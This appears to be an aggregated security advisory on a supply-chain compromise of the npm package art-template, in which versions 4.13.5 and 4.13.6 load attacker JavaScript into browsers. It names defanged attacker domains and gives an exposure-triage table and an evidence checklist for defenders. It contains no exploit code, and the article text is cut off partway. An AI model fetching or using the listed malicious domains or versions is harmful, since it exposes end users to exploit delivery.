RSS

Art-Template NPM Coruna Browser Exploit Compromise

s4mw1se1 pts0 comments

art-template npm Coruna Browser Exploit Compromise | Halting Problems<br>On this page 0% read Executive Summary

Socket reported that the long-standing npm package art-template was compromised after maintainer control changed, with affected versions injecting browser-side script loads into lib/template-web.js. Socket names [email protected] and [email protected] as compromised packages, with 4.13.3 described as an earlier encoded loader stage Socket.

This incident is different from install-time developer malware. A vulnerable build can ship the modified browser bundle to end users, where injected JavaScript loads attacker-controlled code and routes traffic through a Coruna-like Safari/iOS exploit-delivery framework. Use the asset inventory, bundle diff, and cache-scope material below to identify where the poisoned bundle was shipped Socket.

Key Facts

threat_type: "npm package compromise and browser-side exploit delivery"<br>ecosystem: "npm"<br>registry: "npmjs.com"<br>affected_packages:<br>- "art-template"<br>malicious_versions:<br>- "4.13.5"<br>- "4.13.6"<br>known_good_versions: []<br>fixed_or_safe_versions:<br>- "unknown; use maintainer-confirmed clean release and rebuild assets"<br>execution_trigger: "browser loads bundled art-template lib/template-web.js containing injected loadScript calls"<br>primary_impact: "browser exploit delivery, end-user redirection, potential client compromise"<br>campaign_context: "Socket links the delivery chain to a Coruna-like mobile exploit framework."<br>confidence: "high"<br>canonical_source: "https://socket.dev/blog/coruna-respawned-compromised-art-template-npm-package"<br>last_verified: "2026-05-24"<br>Source Confidence & Evidence Mapping

confirmed: Socket identifies [email protected] and [email protected] as compromised npm versions Socket.

confirmed: The injected browser-side code loads remote JavaScript from v3[.]jiathis[.]com and routes into cfww[.]shop infrastructure Socket.

confirmed: Socket reports Safari/iOS targeting and anti-bot checks in the downstream delivery chain Socket.

unclear: The final exploitation module behavior was still under analysis in public reporting, so impact should be treated as potential browser compromise rather than a fully documented post-exploitation chain.

Impact Determination

ClassificationCriteriaRequired evidenceRequired actionClosure conditionConfirmed compromiseA deployed or cached asset contains affected art-template code or listed Coruna infrastructure and was served to users.Lockfile, build artifact hash or content hit, CDN object metadata, proxy/browser telemetry, and deployment timestamp.Remove affected versions, rebuild assets, invalidate caches, and preserve web telemetry for impacted sessions.Clean bundles are deployed, old CDN objects are purged, and no listed infrastructure appears in current traffic.Presumed exposedA frontend build used [email protected] or 4.13.6, but deployed asset and cache state are not yet proven.Build logs, lockfile, package manager cache, deployment manifest, and asset inventory.Rebuild from a clean cache and invalidate CDN or browser-cacheable assets before waiting for final telemetry.Deployment records prove affected assets were replaced and cache invalidation completed.Potentially exposedThe package appears in dependency trees but the project may be server-only or the affected browser file was not bundled.SBOM, bundler output, import graph, and production asset search.Search built assets and web telemetry before declaring no end-user exposure.Asset searches and telemetry prove no affected browser bundle was shipped.Not exposedNo affected package version exists in lockfiles, package caches, deployed bundles, or web telemetry.Lockfile search, artifact search, CDN object search, and proxy/browser telemetry query.Document the negative searches and keep frontend dependency scanning enabled.Search outputs cover both source and deployed assets.UnknownBuild artifacts, CDN state, or web telemetry cannot be queried.Gap statement naming unavailable package, build, CDN, or browser data.Treat production exposure as unresolved and prioritize cache invalidation if affected versions may have shipped.The missing artifact or telemetry source is recovered or the risk is accepted.<br>Minimum Evidence To Collect

minimum_evidence:<br>- "Lockfiles, package manager caches, and SBOMs covering frontend builds."<br>- "Built asset search results for injected domains, paths, and affected hashes."<br>- "Deployment manifest, CDN object metadata, and cache invalidation records."<br>- "Proxy, WAF, CDN, or browser telemetry for the listed infrastructure."<br>- "Production site list showing whether affected bundles were publicly served."<br>Timeline

2026-05-20 Socket publishes public research on the compromised art-template npm package and Coruna-like exploit delivery chain Socket.

2026-05-24 This local feed split creates a standalone art-template article instead of keeping it inside a weekly roundup.

What Happened

art-template is a browser-capable JavaScript templating package. Socket...

browser socket template package affected telemetry

Related Articles

Amazon, Facebook, FBI have access to a private intelligence-sharing network

root-parent18 ptsseattle prism shield network private intelligence

SpaceX not the behemoth everyone thought

kaycebasques13 pts_blockquote instagram data vars text media

The Mirror Is Part of the Machine

london_safari10 ptstelemetry mirror decision logs enough time

Elevated error rates on requests to multiple models

recroad9 ptsclaude incident islands rates elevated error

Donald Trump and sons to be 'forever' exempt from tax audits

doener9 ptsdigital access newsletters premium financial times
terms · privacy · disclaimer · contact · policy
© 2026 NewsHub. All rights reserved.
This site is for informational purposes only. Content is aggregated from publicly available sources. We may earn commissions through affiliate links. Not affiliated with Y Combinator or Hacker News.